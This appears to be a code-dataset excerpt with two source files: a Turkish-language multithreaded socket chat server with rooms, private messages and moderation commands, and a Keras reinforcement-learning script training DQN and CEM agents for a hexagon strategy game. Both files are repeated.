req += "NOY (boyle biri yok)\n"
else:
req += "NOY (boyle oda yok)\n"
else:
req += "NOY (giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
else :
queueLock.acquire()
workQueue.put("ERR \n")
queueLock.release()
conn.close()
s = socket.socket()
host = "0.0.0.0"
port = 8080
addr_ = (host,port)
s.bind(addr_)
s.listen(100)
counter = 0
queueList = []
readThreadList = []
writeThreadList = []
personDict = {}
personIdDict = {}
roomDict = {}
while True:
conn, addr = s.accept()
queueLock= threading.Lock()
workQueue = queue.Queue(100)
queueList.append(workQueue)
readThread_ = readThread(counter,conn,addr,personDict,personIdDict,workQueue,roomDict)
writeThread_ = writeThread(counter,conn,addr,workQueue)
readThreadList.append(readThread_ )
writeThreadList.append(writeThread_ )
readThread_.start()
writeThread_.start()
counter += 1
s.close()
|
proje/proje.py
|
import socket
import threading
import queue
import time
class loggerThread(threading.Thread):
def __init__(self,loggerQueue,conn,addr):
threading.Thread.__init__(self)
self.loggerQueue = loggerQueue
self.conn = conn
self.addr = addr
def run(self):
logger(self.loggerQueue)
def logger(loggerQueue):
info = loggerQueue.get()
print(info.encode())
class writeThread(threading.Thread):
def __init__(self,threadID,conn,addr,workQueue):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.workQueue = workQueue
def run(self):
while True:
request = self.workQueue.get()
self.conn.send(request.encode())
self.conn.close()
class readThread(threading.Thread):
def __init__(self,threadID,conn,addr,clientDict,pidDict,workQueue,roomDict):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.clientDict = clientDict
self.pidDict = pidDict
self.workQueue = workQueue
self.roomDict= roomDict
def run(self):
parser(self.threadID,self.clientDict,self.pidDict,self.workQueue,self.conn,self.roomDict)
def parser(threadID,clientDict,pidDict,workQueue,conn,roomDict):
while True:
data = conn.recv(1024)
dataStr = data.decode().strip().split(":")
message = dataStr[0].split(" ")
if message[0] == "REG":
if len(message) == 3:
req = ""
number =len(clientDict)
if number > 0:
if message[1] in clientDict:
if threadID in pidDict and pidDict[threadID] == message[1]:
if clientDict[message[1]][3] == True:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "OKS (sifre guncellendi)\n"
clientDict[message[1]][0] = message[2]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#---------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu)"+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#-----------------------------------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu) "+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "NIC":
if len(message) == 3:
req = ""
if message[1] in clientDict:
if message[2] == clientDict[message[1]][0]:
req += "WEL (giris yapildi)" + message[1] + "\n"
clientDict[message[1]][3] = True
else:
req += "REJ (sifre hatasi) "+ message[1] + "\n"
else:
req += "REJ (kullanici yok) " +message[1] + "\n"
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OAC":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
req += "REJC " + message[1] + "\n"
else:
req += "OKC " + message[1] +"\n"
roomDict[message[1]] = [[],[],[]]
roomDict[message[1]][0].append(pidDict[threadID])
clientDict[name][2].append(message[1])
print(roomDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GIR":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if clientDict[name][3] == True:
if name in roomDict[message[1]][2]:
req += "YSK (Engellenmisin)\n"
else:
req += "OKO (odaya giris yapildi)\n"
bildirim = name +" "+ message[1] + " odasina giris yapti\n"
clientDict[name][2].append(message[1])
roomDict[message[1]][1].append(name)
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "YSK" + "giris yapilmamis\n"
else:
req += "YSK (oda yok)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "QUI":
name = pidDict[threadID]
clientDict[name][3] = False
queueLock.acquire()
queueList[threadID].put("BYE\n")
queueLock.release()
elif message[0] == "PIN":
queueLock.acquire()
queueList[threadID].put("PON\n")
queueLock.release()
elif message[0] == "PRV":
if len(message) == 2:
name = pidDict[threadID]
if name in clientDict:
if clientDict[name][3] == True:
if message[1] in clientDict:
if clientDict[message[1]][3] == True:
if len(dataStr) == 2:
req =pidDict[threadID] + "->" + dataStr[1] + "\n"
adres = message[1]
queueLock.acquire()
clientDict[adres][1].put(req)
workQueue.put("OKP\n")
queueLock.release()
else:
req = "NOP (mesaj birakmadiniz)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOP (kullanici online degil)\n")
queueLock.release()
else :
req = "NOP " + message[1] + "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "NOP (giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "LRR \n"
queueLock.acquire()
queueList[threadID].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GNL":
if len(message) == 2:
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][1] or name in roomDict[message[1]][0] :
if len(dataStr) == 2:
queueLock.acquire()
workQueue.put("OKG\n")
queueLock.release()
for i in roomDict[message[1]][1]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[i][1].put(req)
queueLock.release()
for j in roomDict[message[1]][0]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[j][1].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG (mesaj birakmadiniz)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(grupta degilsin)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(oyle oda yok)\n")
queueLock.release()
#-----------------------
else:
queueLock.acquire()
workQueue.put("NOG(giris yapilmamis)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GOL":
req = ""
name = pidDict[threadID]
if len(clientDict[name][2]) > 0:
for i in clientDict[name][2]:
req += i + ":"
else:
req += "NOK(girilen oda yok)"
req += "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
elif message[0] == "CIK":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if name in roomDict[message[1]][1]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][1].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
elif name in roomDict[message[1]][0]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][0].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "NOK (odada degilsin) \n"
else:
req += "NOK (oda yok) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OLS":
req = "OLST "
name = pidDict[threadID]
if clientDict[name][3] == True:
for i in roomDict:
req += i + ":"
req += "\n"
else:
req += "NOLS Giris yapin"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
elif message[0] == "ENG":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKE\n"
bildirim= message[1] + " odasından engellendiniz.\n"
roomDict[message[1]][2].append(message[2])
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
req += "NOE(engel icin yonetici olmak lazim)\n"
else:
req += "NOE(boyle oda yok)\n"
else:
req += "NOE(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OKL":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[1] in clientDict[name][2]:
for i in roomDict[message[1]][1]:
req += i + ": normal\n"
for j in roomDict[message[1]][0]:
req += j + ": yonetici\n"
else:
req += "NOL(odada yoksun)\n"
else:
req += "NOL(oyle oda yok)\n"
else:
req += "NOL(giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "KAT":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
if name in roomDict[message[1]][0]:
req += "OKT\n"
mesaj = message[1] + " odasindan atildiniz\n"
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][2].append(message[2])
clientDict[message[2]][2].remove(message[1])
queueLock.acquire()
clientDict[message[2]][1].put(mesaj)
queueLock.release()
else:
req += "REJT(engel icin yonetici olmak lazim)\n"
else:
req += "REJT(Odada boyle biri yok)\n"
else:
req += "REJT(boyle oda yok)\n"
else:
req += "REJT(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "SIL":
if len(message)==2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKS\n"
bildirim = message[1] + " odasi silindi.\n"
for i in roomDict[message[1]][0]:
clientDict[i][2].remove(message[1])
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][1]:
clientDict[j][2].remove(message[1])
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
del roomDict[message[1]]
else:
req += "OSS(yonetici olman lazim)\n"
else:
req += "OSS(boyle oda yok)\n"
else:
req += "OSS(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "YON":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][0].append(message[2])
req += "OKY "+ message[2] +" yonetici yapildi.\n"
bildirim = message[1]+ " odasina yonetici yapildiniz\n"
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
req += "NOY (boyle biri yok)\n"
else:
req += "NOY (boyle oda yok)\n"
else:
req += "NOY (giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
else :
queueLock.acquire()
workQueue.put("ERR \n")
queueLock.release()
conn.close()
s = socket.socket()
host = "0.0.0.0"
port = 8080
addr_ = (host,port)
s.bind(addr_)
s.listen(100)
counter = 0
queueList = []
readThreadList = []
writeThreadList = []
personDict = {}
personIdDict = {}
roomDict = {}
while True:
conn, addr = s.accept()
queueLock= threading.Lock()
workQueue = queue.Queue(100)
queueList.append(workQueue)
readThread_ = readThread(counter,conn,addr,personDict,personIdDict,workQueue,roomDict)
writeThread_ = writeThread(counter,conn,addr,workQueue)
readThreadList.append(readThread_ )
writeThreadList.append(writeThread_ )
readThread_.start()
writeThread_.start()
counter += 1
s.close()
| 0.037821 | 0.067547 |
from keras.layers import Flatten, Conv2D, Dense, Activation
from keras.optimizers import Adam
from keras import Sequential
from rl.agents import DQNAgent, CEMAgent
from rl.memory import SequentialMemory, EpisodeParameterMemory
from rl.policy import EpsGreedyQPolicy
from hexagon_agent import *
from random import shuffle
from multi_agent import *
import sys
import hexagon_ui_api
import os
import numpy as np
from ai_gym import *
# ______________________________________________________________________________________________________________________________
class EnvDef:
centaur_name = 'centaur'
game_name = '1'
HASH_POOL = 10000
NODE_FEATURE_COUNT = 5
DECISION_ACTION_SPACE = 2
SHORT_MEMORY_SIZE = 1
MAX_ROUND = 2000
CELL_FEATURE = 1
MAX_GRID_LENGTH = 5
SPATIAL_INPUT = (MAX_GRID_LENGTH, MAX_GRID_LENGTH)
SPATIAL_OUTPUT = (MAX_GRID_LENGTH * MAX_GRID_LENGTH, )
EPISODE_REWARD = 1000
MOVE_REWARD_MULTIPLIER = 10
DONT_OWN_MOVE_REWARD = -5
CANT_ATTACK_MOVE_REWARD = -3
GAME_VERBOSE = False
RADIUS = 3
# __________________________________________________________________________________________________________________________
class NoneZeroEpsGreedyQPolicy(EpsGreedyQPolicy):
"""Implement the epsilon greedy policy
Eps Greedy policy either:
- takes a random action with probability epsilon from Non-Zero Q-values
- takes current best action with prob (1 - epsilon)
"""
def __init__(self, eps=.1):
super(EpsGreedyQPolicy, self).__init__()
self.eps = eps
def select_action(self, q_values):
"""Return the selected action
# Arguments
q_values (np.ndarray): List of the estimations of Q for each action
# Returns
Selection action
"""
assert q_values.ndim == 1
nb_actions = q_values.shape[0]
if np.random.uniform() < self.eps:
copy_q_values = np.copy(q_values)
idx = np.argmax(q_values)
copy_q_values[idx] = 0
for i in range(0, nb_actions):
val = copy_q_values[i]
copy_q_values[i] = -1e8 if val == 0 else val * np.random.uniform()
action = np.argmax(copy_q_values)
else:
action = np.argmax(q_values)
return action
def get_config(self):
"""Return configurations of EpsGreedyPolicy
# Returns
Dict of config
"""
config = super(EpsGreedyQPolicy, self).get_config()
config['eps'] = self.eps
return config
# __________________________________________________________________________________________________________________________
class MaskableDQNAgent(DQNAgent):
def __init__(self, model, policy=None, test_policy=None, enable_double_dqn=True, enable_dueling_network=False,
dueling_type='avg', mask_processor=None, *args, **kwargs):
DQNAgent.__init__(self, model, policy=policy, test_policy=test_policy,
enable_double_dqn=enable_double_dqn, enable_dueling_network=enable_dueling_network,
dueling_type=dueling_type, *args, **kwargs)
self.mask_processor = mask_processor
def forward(self, observation):
# Select an action.
state = self.memory.get_recent_state(observation)
q_values = self.compute_q_values(state)
if self.mask_processor is not None:
q_values = self.mask_processor.mask(q_values)
if self.training:
action = self.policy.select_action(q_values=q_values)
else:
action = self.test_policy.select_action(q_values=q_values)
# Book-keeping.
self.recent_observation = observation
self.recent_action = action
return action
# __________________________________________________________________________________________________________________________
class DecisionModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Decision_model_params.h5f' + str(r.uniform(0, 10000))
model = Sequential()
model.add(Flatten(input_shape=(1,) + (EnvDef.HASH_POOL * EnvDef.NODE_FEATURE_COUNT * EnvDef.SHORT_MEMORY_SIZE,)))
model.add(Dense(32, activation="relu"))
model.add(Dense(16, activation="relu"))
model.add(Dense(EnvDef.DECISION_ACTION_SPACE))
model.add(Activation('softmax'))
print(model.summary())
model.compile(loss="categorical_crossentropy",
optimizer='adadelta', metrics=['accuracy'])
self.model = model
# ______________________________________________________________________________________________________________________________
class SimplestAttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Flatten(
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Dense(256, activation='relu'))
model.add(Dense(128, activation='relu'))
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='softmax'))
self.model = model
class SimpleAttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(64, (3, 3), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (1, 1), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
class AttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(128, (5, 5), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(4, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (3, 3), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
@staticmethod
def prepare_x(X, batch=False):
"""
:type X: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_INPUT + (1, )
if batch:
shape = (X.shape[0], ) + shape
return np.reshape(X, shape)
@staticmethod
def prepare_y(Y, batch=False):
"""
:type Y: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_OUTPUT + (1, )
if batch:
shape = (Y.shape[0], ) + shape
return np.reshape(Y, shape)
@staticmethod
def process_y(Y):
"""
:type Y: ndarray
:return:
"""
return np.reshape(Y, EnvDef.SPATIAL_OUTPUT)
# ______________________________________________________________________________________________________________________________
if __name__ == '__main__':
args = menu()
env = HierarchicalCentaurEnv(opponent_randomness=args.randomness,
centaur_boost_likelihood=args.centaur_boost_likelihood,
boosting_off=args.boostingoff, attack_off=args.attackoff,
game_verbose=EnvDef.GAME_VERBOSE, radius=EnvDef.RADIUS,
move_shuffle=args.moveshuffle, move_handicap=args.handicap)
np.random.seed(42)
env.seed(42)
prc = CentaurDecisionProcessor()
dec_model = DecisionModel()
attack_model = SimpleAttackModel('Attack_model_params.h5f')
prc = MultiProcessor({AgentType.BoostDecision: prc, AgentType.Attack: CentaurAttackProcessor(EnvDef.SPATIAL_INPUT, random_action=args.randomaction)})
memory = EpisodeParameterMemory(limit=1000, window_length=1)
decision_agent = CEMAgent(model=dec_model.model, nb_actions=EnvDef.DECISION_ACTION_SPACE, memory=memory,
batch_size=50, nb_steps_warmup=200, train_interval=50, elite_frac=0.05)
decision_agent.compile()
memory2 = SequentialMemory(limit=100000, window_length=1)
policy = NoneZeroEpsGreedyQPolicy()
attack_agent = MaskableDQNAgent(attack_model.model,
policy=policy, batch_size=16,
processor=prc.inner_processors[AgentType.Attack],
nb_actions=EnvDef.SPATIAL_OUTPUT[0],
memory=memory2, nb_steps_warmup=500,
enable_dueling_network=True,
mask_processor=prc.inner_processors[AgentType.Attack] if args.usemasking else None)
agent = MultiAgent({AgentType.BoostDecision: decision_agent, AgentType.Attack: attack_agent}, processor=prc, save_frequency=0.05)
agent.inner_agents[AgentType.Attack].compile(Adam(lr=0.001), metrics=['mean_squared_logarithmic_error'])
if args.model_name is not None:
agent.inner_agents[AgentType.Attack].load_weights(args.model_name)
hexagon_ui_api.run_in_background()
if len(sys.argv) == 1:
print('Usage: python centaur_ai_gym.py (train|test)')
elif sys.argv[1] == 'train':
agent.fit(env, nb_steps=300 * 1000, visualize=False, verbose=2, interim_filenames={AgentType.Attack: attack_model.modelName})
agent.save_weights({AgentType.BoostDecision: dec_model.modelName, AgentType.Attack: attack_model.modelName}, overwrite=True)
elif sys.argv[1] == 'test':
agent.test(env, nb_episodes=100)
else:
print('argument not recognised: ' + sys.argv[1])
|
dqn_centaur_ai_gym.py
|
from keras.layers import Flatten, Conv2D, Dense, Activation
from keras.optimizers import Adam
from keras import Sequential
from rl.agents import DQNAgent, CEMAgent
from rl.memory import SequentialMemory, EpisodeParameterMemory
from rl.policy import EpsGreedyQPolicy
from hexagon_agent import *
from random import shuffle
from multi_agent import *
import sys
import hexagon_ui_api
import os
import numpy as np
from ai_gym import *
# ______________________________________________________________________________________________________________________________
class EnvDef:
centaur_name = 'centaur'
game_name = '1'
HASH_POOL = 10000
NODE_FEATURE_COUNT = 5
DECISION_ACTION_SPACE = 2
SHORT_MEMORY_SIZE = 1
MAX_ROUND = 2000
CELL_FEATURE = 1
MAX_GRID_LENGTH = 5
SPATIAL_INPUT = (MAX_GRID_LENGTH, MAX_GRID_LENGTH)
SPATIAL_OUTPUT = (MAX_GRID_LENGTH * MAX_GRID_LENGTH, )
EPISODE_REWARD = 1000
MOVE_REWARD_MULTIPLIER = 10
DONT_OWN_MOVE_REWARD = -5
CANT_ATTACK_MOVE_REWARD = -3
GAME_VERBOSE = False
RADIUS = 3
# __________________________________________________________________________________________________________________________
class NoneZeroEpsGreedyQPolicy(EpsGreedyQPolicy):
"""Implement the epsilon greedy policy
Eps Greedy policy either:
- takes a random action with probability epsilon from Non-Zero Q-values
- takes current best action with prob (1 - epsilon)
"""
def __init__(self, eps=.1):
super(EpsGreedyQPolicy, self).__init__()
self.eps = eps
def select_action(self, q_values):
"""Return the selected action
# Arguments
q_values (np.ndarray): List of the estimations of Q for each action
# Returns
Selection action
"""
assert q_values.ndim == 1
nb_actions = q_values.shape[0]
if np.random.uniform() < self.eps:
copy_q_values = np.copy(q_values)
idx = np.argmax(q_values)
copy_q_values[idx] = 0
for i in range(0, nb_actions):
val = copy_q_values[i]
copy_q_values[i] = -1e8 if val == 0 else val * np.random.uniform()
action = np.argmax(copy_q_values)
else:
action = np.argmax(q_values)
return action
def get_config(self):
"""Return configurations of EpsGreedyPolicy
# Returns
Dict of config
"""
config = super(EpsGreedyQPolicy, self).get_config()
config['eps'] = self.eps
return config
# __________________________________________________________________________________________________________________________
class MaskableDQNAgent(DQNAgent):
def __init__(self, model, policy=None, test_policy=None, enable_double_dqn=True, enable_dueling_network=False,
dueling_type='avg', mask_processor=None, *args, **kwargs):
DQNAgent.__init__(self, model, policy=policy, test_policy=test_policy,
enable_double_dqn=enable_double_dqn, enable_dueling_network=enable_dueling_network,
dueling_type=dueling_type, *args, **kwargs)
self.mask_processor = mask_processor
def forward(self, observation):
# Select an action.
state = self.memory.get_recent_state(observation)
q_values = self.compute_q_values(state)
if self.mask_processor is not None:
q_values = self.mask_processor.mask(q_values)
if self.training:
action = self.policy.select_action(q_values=q_values)
else:
action = self.test_policy.select_action(q_values=q_values)
# Book-keeping.
self.recent_observation = observation
self.recent_action = action
return action
# __________________________________________________________________________________________________________________________
class DecisionModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Decision_model_params.h5f' + str(r.uniform(0, 10000))
model = Sequential()
model.add(Flatten(input_shape=(1,) + (EnvDef.HASH_POOL * EnvDef.NODE_FEATURE_COUNT * EnvDef.SHORT_MEMORY_SIZE,)))
model.add(Dense(32, activation="relu"))
model.add(Dense(16, activation="relu"))
model.add(Dense(EnvDef.DECISION_ACTION_SPACE))
model.add(Activation('softmax'))
print(model.summary())
model.compile(loss="categorical_crossentropy",
optimizer='adadelta', metrics=['accuracy'])
self.model = model
# ______________________________________________________________________________________________________________________________
class SimplestAttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Flatten(
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Dense(256, activation='relu'))
model.add(Dense(128, activation='relu'))
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='softmax'))
self.model = model
class SimpleAttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(64, (3, 3), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (1, 1), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
class AttackModel:
def __init__(self, modelName=None):
"""
:type theMethod: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(128, (5, 5), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(4, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (3, 3), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
@staticmethod
def prepare_x(X, batch=False):
"""
:type X: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_INPUT + (1, )
if batch:
shape = (X.shape[0], ) + shape
return np.reshape(X, shape)
@staticmethod
def prepare_y(Y, batch=False):
"""
:type Y: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_OUTPUT + (1, )
if batch:
shape = (Y.shape[0], ) + shape
return np.reshape(Y, shape)
@staticmethod
def process_y(Y):
"""
:type Y: ndarray
:return:
"""
return np.reshape(Y, EnvDef.SPATIAL_OUTPUT)
# ______________________________________________________________________________________________________________________________
if __name__ == '__main__':
args = menu()
env = HierarchicalCentaurEnv(opponent_randomness=args.randomness,
centaur_boost_likelihood=args.centaur_boost_likelihood,
boosting_off=args.boostingoff, attack_off=args.attackoff,
game_verbose=EnvDef.GAME_VERBOSE, radius=EnvDef.RADIUS,
move_shuffle=args.moveshuffle, move_handicap=args.handicap)
np.random.seed(42)
env.seed(42)
prc = CentaurDecisionProcessor()
dec_model = DecisionModel()
attack_model = SimpleAttackModel('Attack_model_params.h5f')
prc = MultiProcessor({AgentType.BoostDecision: prc, AgentType.Attack: CentaurAttackProcessor(EnvDef.SPATIAL_INPUT, random_action=args.randomaction)})
memory = EpisodeParameterMemory(limit=1000, window_length=1)
decision_agent = CEMAgent(model=dec_model.model, nb_actions=EnvDef.DECISION_ACTION_SPACE, memory=memory,
batch_size=50, nb_steps_warmup=200, train_interval=50, elite_frac=0.05)
decision_agent.compile()
memory2 = SequentialMemory(limit=100000, window_length=1)
policy = NoneZeroEpsGreedyQPolicy()
attack_agent = MaskableDQNAgent(attack_model.model,
policy=policy, batch_size=16,
processor=prc.inner_processors[AgentType.Attack],
nb_actions=EnvDef.SPATIAL_OUTPUT[0],
memory=memory2, nb_steps_warmup=500,
enable_dueling_network=True,
mask_processor=prc.inner_processors[AgentType.Attack] if args.usemasking else None)
agent = MultiAgent({AgentType.BoostDecision: decision_agent, AgentType.Attack: attack_agent}, processor=prc, save_frequency=0.05)
agent.inner_agents[AgentType.Attack].compile(Adam(lr=0.001), metrics=['mean_squared_logarithmic_error'])
if args.model_name is not None:
agent.inner_agents[AgentType.Attack].load_weights(args.model_name)
hexagon_ui_api.run_in_background()
if len(sys.argv) == 1:
print('Usage: python centaur_ai_gym.py (train|test)')
elif sys.argv[1] == 'train':
agent.fit(env, nb_steps=300 * 1000, visualize=False, verbose=2, interim_filenames={AgentType.Attack: attack_model.modelName})
agent.save_weights({AgentType.BoostDecision: dec_model.modelName, AgentType.Attack: attack_model.modelName}, overwrite=True)
elif sys.argv[1] == 'test':
agent.test(env, nb_episodes=100)
else:
print('argument not recognised: ' + sys.argv[1])
